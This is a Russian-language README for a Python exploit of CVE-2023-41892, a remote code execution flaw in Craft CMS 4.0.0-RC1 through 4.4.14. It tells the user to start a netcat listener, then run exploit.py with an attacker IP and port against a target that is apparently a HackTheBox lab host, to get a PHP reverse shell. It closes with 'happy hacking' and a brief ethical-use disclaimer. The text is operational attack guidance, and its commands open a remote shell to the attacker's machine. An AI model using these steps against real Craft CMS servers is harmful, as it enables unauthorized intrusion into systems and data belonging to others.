
CVE-2023-41892 Reverse Shell
Этот скрипт на Python эксплуатирует уязвимость удаленного выполнения кода (CVE-2023-41892) в Craft CMS — популярной системе управления контентом. Версии от 4.0.0-RC1 до 4.4.14 подвержены этой уязвимости, позволяющей злоумышленникам удаленно выполнять произвольный код, например, PHP-реверс-шелл.
Сначала запустите netcat-слушатель в другом терминале:
nc -nlvp 1234
Затем проверьте ваш IP-адрес и запустите эксплойт:
python3 exploit.py -r 10.10.16.47 -p 1234 http://surveillance.htb
Удачного взлома с вашим новым реверс-шеллом!
Данный код предназначен только для целей этичного хакинга и не должен использоваться для каких-либо вредоносных действий!
Благодарность to016 за оригинальный код, который можно найти в этом Gist